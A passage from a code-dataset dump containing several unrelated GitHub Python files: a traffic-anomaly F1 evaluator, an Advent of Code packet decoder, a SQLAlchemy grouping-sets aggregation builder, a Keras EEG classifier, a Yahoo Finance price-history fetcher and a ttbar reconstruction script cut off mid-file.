get_lat_lon(road_osm2, lonlat_dict)\r\n for j in range(len(test_line)):\r\n message3 = test_line[j].split(',')\r\n time2 = message3[0].split(':')[0]\r\n X0 = float(message3[2])\r\n Y0 = float(message3[3])\r\n distance1 = cal_distance_meter(X0,Y0,X1,Y1)\r\n distance2 = cal_distance_meter(X0,Y0,X2,Y2)\r\n if judge_dis(distance1,distance2) and judge_time(time1,time2):\r\n TP1 += 1\r\n wrongset.add(j)\r\n\r\n TP2 = len(wrongset)\r\n P = TP1 / len(our_error_lines)\r\n R = TP2 / len(test_line)\r\n F1 = 2*P*R/(P+R)\r\n return F1, TP1, TP2, P, R\r\n\r\ndef show_matrix(mt):\r\n ax=plt.subplot(111,projection='3d') \r\n for i in range(len(mt)):\r\n for j in range(len(mt[0])):\r\n value = mt[i][j] \r\n ax.scatter(i, j, mt[i][j] ,c=\"r\")\r\n plt.show()\r\n\r\ndef get_b_s(filename):\r\n names = filename.split(',')\r\n return int(names[0][-1:]), int(names[1].split('.')[0])\r\n\r\ndef real_run():\r\n root_dir = './data/result1'\r\n filelist = os.listdir(root_dir)\r\n \r\n best_F1 = 0\r\n F1_matrix = [[0 for col in range(10)]for row in range(9)]\r\n\r\n for filename in filelist:\r\n filepath = os.path.join(root_dir, filename)\r\n F1, TP1, TP2, P, R = cal_f1(filepath)\r\n beta, suppose = get_b_s(filename)\r\n print(' beta = ', beta, 'sup = ', suppose)\r\n print(' F1:', F1)\r\n print(' TP1:', TP1)\r\n print(' TP2:', TP2)\r\n print(' P:', P)\r\n print(' R:', R)\r\n \r\n\r\n #save it to matrix 1-9 1-10 (9*10)\r\n \r\n F1_matrix[int(beta)-1][int(suppose)-1] = F1\r\n\r\n if F1 > best_F1:\r\n best_F1 = F1\r\n best_beta = beta\r\n best_suppose = suppose\r\n best_TP1 = TP1\r\n best_TP2 = TP2\r\n best_P = P\r\n best_R = R\r\n\r\n print('-----best result-----') \r\n print(' beta:', best_beta, ' suppose:', best_suppose)\r\n print(' F1 =', best_F1)\r\n print(' TP1:', best_TP1)\r\n print(' TP2:', best_TP2)\r\n print(' P:', best_P)\r\n print(' R:', best_R)\r\n\r\n show_matrix(F1_matrix)\r\n return\r\n\r\ndef real_run_one():\r\n #root_dir = './result'\r\n #filelist = os.listdir(root_dir)\r\n root_dir = './data/result'\r\n filelist = os.listdir(root_dir)\r\n\r\n filename = filelist[0]\r\n filepath = os.path.join(root_dir, filename)\r\n \r\n best_F1 = 0\r\n #F1_matrix = [[0 for col in range(10)]for row in range(9)]\r\n\r\n #for filename in filelist:\r\n #filepath = os.path.join(root_dir, filename)\r\n F1, TP1, TP2, P, R = cal_f1(filepath)\r\n #beta, suppose = get_b_s(filename)\r\n beta, suppose =2,6\r\n print(' beta = ', beta, 'sup = ', suppose)\r\n print(' F1:', F1)\r\n print(' TP1:', TP1)\r\n print(' TP2:', TP2)\r\n print(' P:', P)\r\n print(' R:', R)\r\n \r\n\r\n #save it to matrix 1-9 1-10 (9*10)\r\n \r\n #F1_matrix[int(beta)-1][int(suppose)-1] = F1\r\n\r\n if F1 > best_F1:\r\n best_F1 = F1\r\n best_beta = beta\r\n best_suppose = suppose\r\n best_TP1 = TP1\r\n best_TP2 = TP2\r\n best_P = P\r\n best_R = R\r\n\r\n print('-----best result-----') \r\n print(' beta:', best_beta, ' suppose:', best_suppose)\r\n print(' F1 =', best_F1)\r\n print(' TP1:', best_TP1)\r\n print(' TP2:', best_TP2)\r\n print(' P:', best_P)\r\n print(' R:', best_R)\r\n\r\n #show_matrix(F1_matrix)\r\n return\r\n\r\n\r\ndef run():\r\n real_flag = 2\r\n if real_flag == 1:\r\n real_run()\r\n elif real_flag == 2:\r\n real_run_one()\r\n else:\r\n #do some test here and set real_flag = False\r\n ax=plt.subplot(111,projection='3d') \r\n ax.scatter(1, 2, 3 ,c=\"r\")\r\n ax.scatter(5, 7, 9 ,c=\"r\")\r\n plt.show()\r\n \r\n\r\n\r\n#beta = 1\r\n#suppose = 1\r\n\r\n#for i in range(9):\r\n #for j in range(10):\r\n #print()\r\n #result = ...\r\n 
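# --- Editor's note (worked example, not part of the original record) ---
# The score computed in cal_f1 is the standard F1. For example, with TP1 = 80
# matched detections out of 100 reported (P = 0.8) and TP2 = 60 covered
# ground-truth incidents out of 100 (R = 0.6):
#     F1 = 2*P*R / (P+R) = 0.96 / 1.4 ~ 0.686
# A quick sanity check for cal_distance_meter: one degree of latitude spans
# roughly 111 km, so cal_distance_meter(39.0, 116.0, 40.0, 116.0) should return
# about 111000 metres.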
#np.savetxt(\"....../result\" + '.' + beta + '.' + suppose +'.txt',......)\r\n #suppose += 1\r\n #beta += 1\r\n","repo_name":"PengFCB/Traffic_Anomaly_Detection_System_UCAS","sub_path":"cal_f1/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5905,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"24312514867","text":"import sys\nimport numpy\n\nVERSION_LENGTH = 3\nTYPE_LENGTH = 3\nID_INDEX = 6\nSUB_PACKETS_LENGTH = 15\nADDITIONAL_INFO_START_INDEX = 7\nSUB_PACKETS_NUMBER = 11\n\nhex_dic = {\n \"0\": \"0000\",\n \"1\": \"0001\",\n \"2\": \"0010\",\n \"3\": \"0011\",\n \"4\": \"0100\",\n \"5\": \"0101\",\n \"6\": \"0110\",\n \"7\": \"0111\",\n \"8\": \"1000\",\n \"9\": \"1001\",\n \"A\": \"1010\",\n \"B\": \"1011\",\n \"C\": \"1100\",\n \"D\": \"1101\",\n \"E\": \"1110\",\n \"F\": \"1111\"\n}\n\ndef get_result_from_subpackets(values, operation_code):\n\n if operation_code == 0:\n return numpy.sum(values)\n if operation_code == 1:\n return numpy.prod(values)\n if operation_code == 2:\n return min(values)\n if operation_code == 3:\n return max(values)\n if operation_code == 5:\n if len(values) != 2:\n raise\n return int(values[0] > values[1])\n if operation_code == 6:\n if len(values) != 2:\n raise\n return int(values[0] < values[1])\n if operation_code == 7:\n if len(values) != 2:\n raise\n return int(values[0] == values[1])\n\n \n# Returns value and lenght\ndef parse_literal_packet(packet):\n\n is_last_group = False\n sub_group_start_index = (VERSION_LENGTH + TYPE_LENGTH)\n binary_string = \"\"\n \n while not is_last_group:\n \n sub_group_start_bit = packet[sub_group_start_index]\n if sub_group_start_bit == \"0\":\n is_last_group = True\n \n binary_string += packet[sub_group_start_index + 1: sub_group_start_index + 5]\n sub_group_start_index += 5\n \n decimal_number = int(binary_string, 2)\n return (decimal_number, sub_group_start_index)\n \ndef parse_operator_packet(packet):\n \n operation_code = int(packet[VERSION_LENGTH: VERSION_LENGTH + TYPE_LENGTH], 2)\n print(\"operator code\", operation_code)\n length_id = packet[ID_INDEX]\n\n if length_id == \"0\":\n print(\"length id 0\")\n sub_packets_len = get_sub_packets_length(packet)\n print(\"sub packet len\", sub_packets_len)\n packets_start_index = (ADDITIONAL_INFO_START_INDEX + SUB_PACKETS_LENGTH)\n result, length = parse_bits_delimited_packets(packet[packets_start_index:], sub_packets_len, operation_code)\n return (result, length + packets_start_index)\n \n \n elif length_id == \"1\":\n print(\"length id 1\")\n sub_packets_num = get_sub_packets_number(packet)\n print(\"length\", sub_packets_num)\n packets_start_index = (ADDITIONAL_INFO_START_INDEX + SUB_PACKETS_NUMBER)\n result, length = parse_number_delimited_packets(packet[packets_start_index:], sub_packets_num, operation_code)\n return (result, length + packets_start_index)\n\n else:\n raise\n\ndef get_sub_packets_number(packet):\n number = packet[ADDITIONAL_INFO_START_INDEX: ADDITIONAL_INFO_START_INDEX + SUB_PACKETS_NUMBER]\n return int(number, 2)\n\ndef get_sub_packets_length(packet):\n number = packet[ADDITIONAL_INFO_START_INDEX: ADDITIONAL_INFO_START_INDEX + SUB_PACKETS_LENGTH]\n return int(number, 2)\n\n#returns value_sum and length\ndef parse_number_delimited_packets(packets, number_of_packets, operation_code):\n\n packet_number = 0\n packet_start_index = 0\n sub_values = []\n\n while packet_number < number_of_packets:\n \n print(\"parse packet\", packet_number)\n packet_number += 1\n type = 
packets[packet_start_index + VERSION_LENGTH: packet_start_index + VERSION_LENGTH + TYPE_LENGTH]\n print(\"typee\", type)\n \n if type == \"100\":\n literal_number, literal_length = parse_literal_packet(packets[packet_start_index:])\n packet_start_index += literal_length\n sub_values.append(literal_number)\n \n else:\n operator_result, operator_length = parse_operator_packet(packets[packet_start_index:])\n sub_values.append(operator_result)\n packet_start_index += operator_length\n \n result = get_result_from_subpackets(sub_values, operation_code)\n \n return (result, packet_start_index)\n\ndef parse_bits_delimited_packets(packets, packets_len, operation_code):\n\n print(\"packets\", packets)\n packet_start_index = 0\n sub_values = []\n \n while packet_start_index < packets_len:\n \n type = packets[packet_start_index + VERSION_LENGTH: packet_start_index + VERSION_LENGTH + TYPE_LENGTH]\n print(\"type\", type)\n \n if type == \"100\":\n literal_value, literal_length = parse_literal_packet(packets[packet_start_index:])\n sub_values.append(literal_value)\n packet_start_index += literal_length\n print(\"literal length\", literal_length)\n \n else:\n operator_result, operator_length = parse_operator_packet(packets[packet_start_index:])\n sub_values.append(operator_result)\n packet_start_index += operator_length\n \n \n result = get_result_from_subpackets(sub_values, operation_code)\n return (result, packet_start_index)\n \n \ndef solution_2(packet):\n\n version = packet[0:VERSION_LENGTH]\n type = packet[VERSION_LENGTH: VERSION_LENGTH + TYPE_LENGTH]\n \n if type == \"100\":\n return int(version, 2)\n \n else:\n operator_version, _ = parse_operator_packet(packet)\n return operator_version\n\n\ndef convert_to_binary(input):\n input_len = len(input)\n binary_string = \"\"\n \n for hex in input:\n binary_string += hex_dic[hex]\n return binary_string\n \ndef main():\n if len(sys.argv) < 2:\n print(\"missing args\")\n return\n \n filename = sys.argv[1]\n f = open(filename, \"r\")\n line = f.readlines()[0]\n converted_input = convert_to_binary(line)\n print(\"converted input\", converted_input)\n print(solution_2(converted_input))\n\nmain()\n\n\n","repo_name":"lauracorssac/AdventOfCode2021","sub_path":"16/solution2.py","file_name":"solution2.py","file_ext":"py","file_size_in_byte":5875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25795307298","text":"from typing import Dict, List, Optional\n\nimport sqlalchemy\nfrom sqlalchemy import cast, func, union_all\nfrom sqlalchemy.sql import Select\nfrom sqlalchemy.sql.elements import ColumnClause, literal_column\n\nfrom panoramic.cli.husky.core.sql_alchemy_util import (\n AGGREGATION_TYPE_TO_SQLALCHEMY_FN,\n safe_identifier,\n safe_quote_identifier,\n sort_columns,\n)\nfrom panoramic.cli.husky.core.taxonomy.enums import AggregationType\nfrom panoramic.cli.husky.service.blending.blending_taxon_manager import (\n BlendingTaxonManager,\n)\nfrom panoramic.cli.husky.service.context import HuskyQueryContext\nfrom panoramic.cli.husky.service.filter_builder.component import FilterBuilder\nfrom panoramic.cli.husky.service.filter_builder.filter_clauses import FilterClause\nfrom panoramic.cli.husky.service.select_builder.taxon_model_info import TaxonModelInfo\nfrom panoramic.cli.husky.service.types.api_data_request_types import GroupingSets\nfrom panoramic.cli.husky.service.types.types import Dataframe, DataframeColumn\n\n_PANORAMIC_GROUPINGSETS_NULL = 'PANORAMIC_GROUPINGSETS_NULL'\n\n\nclass 
MetricPhaseBuilder:\n\n AGGREGATION_FUNCTIONS_MAP: Dict[AggregationType, func.Function] = {\n AggregationType.sum: AGGREGATION_TYPE_TO_SQLALCHEMY_FN[AggregationType.sum],\n AggregationType.count_all: AGGREGATION_TYPE_TO_SQLALCHEMY_FN[AggregationType.sum],\n AggregationType.count_distinct: AGGREGATION_TYPE_TO_SQLALCHEMY_FN[AggregationType.sum],\n }\n \"\"\"\n Map of specific aggregation functions to SQL functions in this phase\n \"\"\"\n\n def __init__(self, taxon_manager: BlendingTaxonManager):\n self.taxon_manager = taxon_manager\n\n def calculate_dataframe(\n self,\n ctx: HuskyQueryContext,\n df: Dataframe,\n grouping_sets: Optional[GroupingSets] = None,\n filter_clause: Optional[FilterClause] = None,\n ) -> Dataframe:\n \"\"\"\n Applies in this order:\n - pre aggregation logic\n - aggregation by group by or grouping sets\n - optional step of window function aggregation\n - after aggregation logic\n - filters. Filters are applied here to simplify the final query and apply filtering before filling date gaps.\n \"\"\"\n pre_agg_columns = [] # Columns with applied aggregation function in aggregation step\n\n # Columns to select from window step - columns that are not removed and dont need window step\n select_from_window_step: List[ColumnClause] = []\n df_columns: List[DataframeColumn] = [] # Final df columns after all steps.\n group_columns = []\n final_columns: List[ColumnClause] = []\n for pre_formula in self.taxon_manager.plan.metric_pre:\n col = pre_formula.formula.label(pre_formula.label)\n aggregation_fn = self.AGGREGATION_FUNCTIONS_MAP.get(pre_formula.aggregation.type)\n\n if aggregation_fn:\n # we know the aggregation function so let's use it\n pre_agg_columns.append(aggregation_fn(col).label(pre_formula.label))\n else:\n # if no aggregation function is defined, then we simply group by this formula\n group_columns.append(col)\n\n select_from_window_step.append(col)\n\n # taxon slugs used in group by clause\n dimension_taxon_slugs = {group_column.name for group_column in group_columns}\n\n for post_formula, taxon in self.taxon_manager.plan.metric_post:\n post_formula_sql = post_formula.render_formula(ctx.dialect, dimension_taxon_slugs)\n col = post_formula_sql.label(taxon.slug_safe_sql_identifier)\n final_columns.append(col)\n df_columns.append(DataframeColumn(taxon.slug_expr, taxon))\n\n # Aggregation query with column logic. This is the first aggregation step, regular group by\n # or a common table expression with multiple group by statements in case of grouping sets.\n pre_query = self._add_aggregation(df.query, pre_agg_columns, group_columns, grouping_sets)\n\n # Post aggregation logic\n post_query = Select(columns=sort_columns(final_columns)).select_from(pre_query)\n\n slug_to_column = Dataframe.dataframe_columns_to_map(df_columns)\n if filter_clause:\n taxon_model_info = {\n str(slug): TaxonModelInfo(safe_quote_identifier(slug, ctx.dialect)) for slug in slug_to_column.keys()\n }\n post_query = FilterBuilder.augment_query(ctx, post_query, taxon_model_info, filter_clause)\n\n return Dataframe(post_query, slug_to_column, df.used_model_names)\n\n @classmethod\n def _add_aggregation(\n cls,\n inner_query: Select,\n aggregation_columns: List[ColumnClause],\n group_by_columns: List[ColumnClause],\n grouping_sets: Optional[GroupingSets] = None,\n ) -> Select:\n \"\"\"\n Aggregates raw metric taxons. 
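For grouping sets [['d1'], []] over one\n        summed metric m, the generated SQL is shaped roughly like this\n        (illustrative sketch, not verbatim output):\n\n            WITH __cte_grouping_sets AS\n                (SELECT CAST(d1 AS VARCHAR) AS d1, m FROM inner_query)\n            SELECT d1, sum(m) FROM __cte_grouping_sets GROUP BY d1\n            UNION ALL\n            SELECT 'PANORAMIC_GROUPINGSETS_NULL' AS d1, sum(m)\n                FROM __cte_grouping_sets\n\n        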
Groups by given dimension taxons or grouping sets.\n\n :param inner_query: Query to aggregate\n :param aggregation_columns: List of columns with applied aggregation function\n :param group_by_columns: List of columns to group by\n :param grouping_sets: Optional list of grouping sets to group by instead\n :return: Aggregated query\n \"\"\"\n if grouping_sets:\n # Because we union _PANORAMIC_GROUPINGSETS_NULL with column that can be date(time) or number,\n # we must cast all group columns to text. Some DB engines fail when we do casting and grouping in one query,\n # thus here we need to stringify the group columns in the CTE, and not in the group by query just below...\n group_by_column_names = {col.name for col in group_by_columns}\n stringified_group_columns = []\n for col in inner_query.columns:\n if col.name in group_by_column_names:\n stringified_group_columns.append(cast(col, sqlalchemy.VARCHAR).label(col.name))\n else:\n stringified_group_columns.append(col)\n\n # common table expression reused by multiple grouping sets queries\n cte_query = (\n Select(columns=sort_columns(stringified_group_columns))\n .select_from(inner_query)\n .cte('__cte_grouping_sets')\n )\n grouping_sets_queries = []\n\n for grouping_set in grouping_sets:\n safe_grouping_set = [safe_identifier(col) for col in grouping_set]\n # dimensions in the grouping set, used to aggregate values with group by\n gs_group_columns = [col for col in group_by_columns if col.name in safe_grouping_set]\n # extra dimensions not in the grouping set, returned as custom null values\n gs_null_columns = [\n literal_column(f\"'{_PANORAMIC_GROUPINGSETS_NULL}'\").label(col.name)\n for col in group_by_columns\n if col.name not in safe_grouping_set\n ]\n grouping_sets_queries.append(\n Select(columns=sort_columns(gs_group_columns + gs_null_columns + aggregation_columns))\n .select_from(cte_query)\n .group_by(*sort_columns(gs_group_columns))\n )\n return union_all(*grouping_sets_queries)\n\n # If grouping sets are not defined, use all dimensions for grouping.\n return (\n Select(columns=sort_columns(group_by_columns + aggregation_columns))\n .select_from(inner_query)\n .group_by(*sort_columns(group_by_columns))\n )\n","repo_name":"panoramichq/panoramic-cli","sub_path":"src/panoramic/cli/husky/service/blending/metric_phase_builder.py","file_name":"metric_phase_builder.py","file_ext":"py","file_size_in_byte":7615,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"3905462014","text":"import sys\nimport numpy\nimport h5py\nimport tensorflow as tf\nimport tensorflow.keras as keras\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\nfrom keras.callbacks import ModelCheckpoint\nnumpy.set_printoptions(threshold=sys.maxsize, suppress=True)\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth=True\nsess = tf.Session(config=config)\nfrom keras import backend as K\nK.set_session(sess)\nimport datetime\n\n\n\n\ndef plot_value_array(i, predictions_array, true_label):\n # Function To Print Graph Displaying Probablillity\n predictions_array, true_label = predictions_array[i], true_label[i]\n plt.grid(False)\n plt.xticks([])\n plt.yticks([])\n thisplot = plt.bar(range(10), predictions_array, color=\"#777777\")\n plt.ylim([0, 1])\n predicted_label = np.argmax(predictions_array)\n\n thisplot[predicted_label].set_color('red')\n thisplot[true_label].set_color('blue')\n\n\ndef get_dataset(filename):\n # Load Dataset From File\n hf = h5py.File(filename, 'r')\n all_data = 
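None  # seeded below; see the note that follows\n    # np.zeros([100, 5, 3]) gives np.concatenate a base to append to, but\n    # it also leaves 100 all-zero rows in the returned array;\n    # np.empty([0, 5, 3]) would avoid that.\n    all_data = 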
np.zeros([100, 5, 3])\n for i in hf:\n data = hf[i][:]\n all_data = np.concatenate((all_data, data), axis=0)\n\n all_data[:, :, 2] = (keras.utils.normalize(all_data[:, :, 2], order=2))\n return all_data\n\n\ndef separate_data(all_data):\n # Separate between Data & Labels\n labels = (all_data[:, :1, :1]).flatten()\n data_only = all_data[:, :, 1:]\n return data_only, labels\n\n\ndef create_model():\n # Create New Model\n model = keras.Sequential([\n keras.layers.Flatten(input_shape=(5, 2)),\n keras.layers.Dense(25, activation=tf.nn.relu),\n keras.layers.Dense(50, activation=tf.nn.softmax),\n\tkeras.layers.Dense(50),\n keras.layers.Dense(50, activation=tf.nn.sigmoid)\n ])\n\n model.compile(optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n return model\n\n\ndef train_model(model, data_only, labels, epochs):\n filepath = \"weights/weights-improvement-{epoch:02d}-{val_acc:.2f}.hdf5\"\n logdir = \"logs/scalars/\" + datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n tensorboard_callback = keras.callbacks.TensorBoard(log_dir=logdir)\n checkpoint = ModelCheckpoint(filepath, monitor='val_acc', verbose=1, save_best_only=True, mode='max')\n callbacks_list = [checkpoint, tensorboard_callback]\n model.fit(data_only, labels, epochs=epochs, callbacks=callbacks_list, batch_size=104, validation_split=0.20,\n verbose=1)\n model.save('model.h5')\n return model\n\n\ndef plot_model(predictions_single, labels):\n plot_value_array(0, predictions_single, labels.astype(int))\n plt.xticks(range(3), ['red', 'white', 'blue'], rotation=45)\n plt.show()\n\n\ndef load_existing_model(filename):\n model = keras.models.load_model(filename)\n return model\n\n\ndef make_prediction(model, data_only, i):\n test = (np.expand_dims(data_only[i], 0))\n predictions_single = model.predict(test)\n prediction_result = np.argmax(predictions_single[0])\n print(int(prediction_result))\n\n\ndef make_random_prediction(model, data_only, labels):\n randnum = random.randint(100, 1100)\n test = (np.expand_dims(data_only[randnum], 0))\n predictions_single = model.predict(test)\n prediction_result = np.argmax(predictions_single[0])\n print(prediction_result, labels[randnum])\n\n\ndef default_action():\n all_data = get_dataset('data.h5')\n data_only, labels = separate_data(all_data)\n model = load_existing_model('model.h5')\n train_model(model, data_only, labels, 10000)\n","repo_name":"matthew-graves/eeg-muse-ai","sub_path":"brain_lib.py","file_name":"brain_lib.py","file_ext":"py","file_size_in_byte":3525,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"23811227860","text":"import sys\n\nsys.path.insert(0, \"D:/Users/masoodw/ML_FINANCE/\")\n\nfrom multiprocessing.dummy import Pool as ThreadPool\nimport pandas as pd\nimport requests\nimport arrow\nimport datetime\nfrom requests.adapters import HTTPAdapter\nfrom requests.packages.urllib3.util.retry import Retry\n#from pandas_datareader._utils import RemoteDataError\n\n\n##########################################################################################\ndef unix_time_millis(dt):\n epoch = datetime.datetime.utcfromtimestamp(0)\n return int((dt - epoch).total_seconds())\n\n\n##########################################################################################\n'''interval one of [1m, 2m, 5m, 15m, 30m, 60m, 90m, 1h, 1d, 5d, 1wk, 1mo, 3mo]'''\n\n\ndef get_yahoo_symbol_snapshot(symbol='SBIN.NS', data_range='5m', data_interval='1d'):\n # print('pulling symbol:' + symbol)\n session = 
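None  # placeholder; the retrying session is built just below\n    # Retry(connect=10, backoff_factor=0.3) retries failed connection\n    # attempts with exponential backoff; mounting the adapter on both\n    # 'http://' and 'https://' applies it to every request.\n    session = 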
requests.Session()\n retry = Retry(connect=10, backoff_factor=0.3)\n adapter = HTTPAdapter(max_retries=retry)\n session.mount('http://', adapter)\n session.mount('https://', adapter)\n\n try:\n conn_url = 'https://query1.finance.yahoo.com/v8/finance/chart/{symbol}?range={data_range}&interval={data_interval}'. \\\n format(**locals())\n\n res = session.get(conn_url)\n if res.status_code != 200:\n return None\n\n data = res.json()\n except requests.ConnectionError as e:\n print(\"OOPS!! Connection Error.\")\n pass\n\n if data['chart']['result'] is None:\n return None\n\n body = data['chart']['result'][0]\n\n if 'timestamp' not in body:\n return None\n\n dt = datetime.datetime\n dt = pd.Series(map(lambda x: arrow.get(x).to('Europe/Vienna').datetime.replace(tzinfo=None), body['timestamp']),\n name='Datetime')\n df = pd.DataFrame(body['indicators']['quote'][0], index=dt)\n dg = pd.DataFrame(body['timestamp'])\n df = df.rename(columns={\"open\": \"Open\", \"close\": \"Close\", \"high\": \"High\", \"low\": \"Low\", 'volume': 'Volume'})\n df_adj = pd.DataFrame(body['indicators']['adjclose'][0], index=dt)\n df['Datetime'] = df.index\n df['Adj_Close'] = df_adj['adjclose']\n df['Symbol'] = symbol\n df = df.reset_index(drop=True)\n return df.loc[:, ('Datetime', 'Open', 'High', 'Low', 'Close', 'Volume', 'Symbol', 'Adj_Close')]\n\n\n\n##########################################################################################\n\ndef get_yahoo_symbol_history(symbol=None, start_date=None, end_date=None, data_interval='1d'):\n period_from = unix_time_millis(datetime.datetime.strptime(start_date, '%Y-%m-%d'))\n period_to = unix_time_millis(datetime.datetime.strptime(end_date, '%Y-%m-%d'))\n\n session = requests.Session()\n retry = Retry(connect=10, backoff_factor=0.3)\n adapter = HTTPAdapter(max_retries=retry)\n session.mount('http://', adapter)\n session.mount('https://', adapter)\n\n try:\n conn_url = 'https://query1.finance.yahoo.com/v8/finance/chart/{symbol}?\\\n &period1={period_from}&period2={period_to}&interval={data_interval}'.format(**locals())\n\n res = session.get(conn_url)\n if res.status_code != 200:\n return None\n\n data = res.json()\n except requests.ConnectionError as e:\n print(\"OOPS!! 
Connection Error.\")\n pass\n\n body = data['chart']['result'][0]\n\n if 'timestamp' not in body:\n return None\n\n dt = datetime.datetime\n dt = pd.Series(map(lambda x: arrow.get(x).to('Europe/Vienna').datetime.replace(tzinfo=None), body['timestamp']),\n name='Datetime')\n df = pd.DataFrame(body['indicators']['quote'][0], index=dt)\n dg = pd.DataFrame(body['timestamp'])\n df = df.rename(columns={\"open\": \"Open\", \"close\": \"Close\", \"high\": \"High\", \"low\": \"Low\", 'volume': 'Volume'})\n df_adj = pd.DataFrame(body['indicators']['adjclose'][0], index=dt)\n df['Datetime'] = df.index\n df['Adj_Close'] = df_adj['adjclose']\n df['Symbol'] = symbol\n df=df.reset_index(drop=True)\n return df.loc[:, ('Datetime', 'Open', 'High', 'Low', 'Close', 'Volume', 'Symbol', 'Adj_Close')]\n\n\ndef get_price_history(symbol):\n df_history = pd.DataFrame()\n dt_start = '2015-01-01'\n dt_end = '2020-05-09'\n try:\n print('Pulling: ' + symbol + ' dates:'+dt_start + '-' + dt_end)\n df_history = get_yahoo_symbol_history(symbol, dt_start, dt_end, '1d')\n if df_history is None:\n return None\n df_history['Symbol'] = symbol\n except e:\n print('Error:' + e)\n pass\n return df_history\n\n\ndef extract_indices_history(symbol_list):\n print(symbol_list)\n # Run with Multi threading\n pool = ThreadPool(500)\n # Open the urls in their own threads and return the results\n results = pd.concat(pool.map(get_price_history, symbol_list))\n # Close the pool and wait for the work to finish\n pool.close()\n pool.join()\n print('Symbols' + str(results['Symbol'].nunique()))\n print('Coverage %' + str((results['Symbol'].nunique() / results.shape[0]) * 100))\n print('Total records:' + str(results.shape))\n return results\n\ndef extract_index_history(symbol, dt_start, dt_end):\n df_history = pd.DataFrame()\n try:\n print('Pulling: ' + symbol + ' dates:'+dt_start + '-' + dt_end)\n df_history = get_yahoo_symbol_history(symbol, dt_start, dt_end, '1d')\n if df_history is None:\n return None\n df_history['Symbol'] = symbol\n except RemoteDataError:\n print('Symbol Not Found:' + symbol)\n pass\n return df_history\n\n","repo_name":"wasifmasood/STOCKS","sub_path":"packages/.ipynb_checkpoints/price_history-checkpoint.py","file_name":"price_history-checkpoint.py","file_ext":"py","file_size_in_byte":5521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7004188560","text":"#!/usr/bin/env python\nfrom ROOT import *\nimport numpy as np\nfrom AngryTops.features import *\nimport array\nimport pickle\nfrom AngryTops.Plotting.identification_helper import MakeP4, undo_scaling\n\n# write to tree file\n\n################################################################################\n# CONSTANTS\ntraining_dir = \"../CheckPoints/Summer/May21/\"\noutput_dir = \"../CheckPoints/Summer/May21/\"\nrepresentation = \"pxpypzEM\"\nscaling = True # whether the dataset has been passed through a scaling function or not\n\nm_t = 172.5\nm_W = 80.4\nm_b = 4.95\n\nALL = 0\nNONE = 1\nONLY = 2\nb_tagging = NONE \n\n################################################################################\n# load data\n\nprint(\"INFO: fitting ttbar decay chain...\")\npredictions = np.load(training_dir + 'predictions.npz')\njets = predictions['input']\ntrue = predictions['true']\nfitted = predictions['pred']\n\nparticles_shape = (true.shape[1], true.shape[2])\nprint(\"jets shape\", jets.shape)\nprint(\"b tagging option\", b_tagging)\nif scaling:\n scaler_filename = training_dir + \"scalers.pkl\"\n with open( 
scaler_filename, \"rb\" ) as file_scaler:\n jets_scalar = pickle.load(file_scaler)\n lep_scalar = pickle.load(file_scaler)\n output_scalar = pickle.load(file_scaler)\n\n jets_jets, jets_lep, true, fitted = undo_scaling(jets_scalar, lep_scalar, output_scalar, jets, true, fitted)\n\n\nif not scaling:\n jets_lep = jets[:,:6]\n jets_jets = jets[:,6:]\n jets_jets = jets_jets.reshape((jets_jets.shape[0],5,6))\n jets_jets = np.delete(jets_jets, 5, 2)\n\n# jets\njet_mu = jets_lep\n# First jet for every event\njet_1 = jets_jets[:,0]\n# Second jet for every event\njet_2 = jets_jets[:,1]\njet_3 = jets_jets[:,2]\njet_4 = jets_jets[:,3]\njet_5 = jets_jets[:,4]\n# Create an array with each jet's arrays for accessing b-tagging states later.\njet_list = np.stack([jet_1, jet_2, jet_3, jet_4, jet_5]) \n\n# truth\ny_true_W_had = true[:,0,:]\ny_true_W_lep = true[:,1,:]\ny_true_b_had = true[:,2,:]\ny_true_b_lep = true[:,3,:]\ny_true_t_had = true[:,4,:]\ny_true_t_lep = true[:,5,:]\n\n# fitted\ny_fitted_W_had = fitted[:,0,:]\ny_fitted_W_lep = fitted[:,1,:]\ny_fitted_b_had = fitted[:,2,:]\ny_fitted_b_lep = fitted[:,3,:]\ny_fitted_t_had = fitted[:,4,:]\ny_fitted_t_lep = fitted[:,5,:]\n\n# store number of events as a separate variable for clarity\nn_events = true.shape[0]\nw = 1\nprint(\"INFO ...done\")\n\nofilename = \"{}/predictions_May21.root\".format(output_dir)\n# Open output file\nofile = TFile.Open( ofilename, \"recreate\" )\nofile.cd()\n\nb_jet1_px_obs = array.array( 'f', [ -1.] )\nb_jet1_py_obs = array.array( 'f', [ -1.] )\nb_jet1_pz_obs = array.array( 'f', [ -1.] )\nb_jet1_pt_obs = array.array( 'f', [ -1.] )\nb_jet1_E_obs = array.array( 'f', [ -1.] )\nb_jet1_m_obs = array.array( 'f', [ -1.] )\nb_jet1_btag_obs = array.array( 'f', [ -1.] )\nb_jet2_px_obs = array.array( 'f', [ -1.] )\nb_jet2_py_obs = array.array( 'f', [ -1.] )\nb_jet2_pz_obs = array.array( 'f', [ -1.] )\nb_jet2_pt_obs = array.array( 'f', [ -1.] )\nb_jet2_E_obs = array.array( 'f', [ -1.] )\nb_jet2_m_obs = array.array( 'f', [ -1.] )\nb_jet2_btag_obs = array.array( 'f', [ -1.] )\nb_jet3_px_obs = array.array( 'f', [ -1.] )\nb_jet3_py_obs = array.array( 'f', [ -1.] )\nb_jet3_pz_obs = array.array( 'f', [ -1.] )\nb_jet3_pt_obs = array.array( 'f', [ -1.] )\nb_jet3_E_obs = array.array( 'f', [ -1.] )\nb_jet3_m_obs = array.array( 'f', [ -1.] )\nb_jet3_btag_obs = array.array( 'f', [ -1.] )\nb_jet4_px_obs = array.array( 'f', [ -1.] )\nb_jet4_py_obs = array.array( 'f', [ -1.] )\nb_jet4_pz_obs = array.array( 'f', [ -1.] )\nb_jet4_pt_obs = array.array( 'f', [ -1.] )\nb_jet4_E_obs 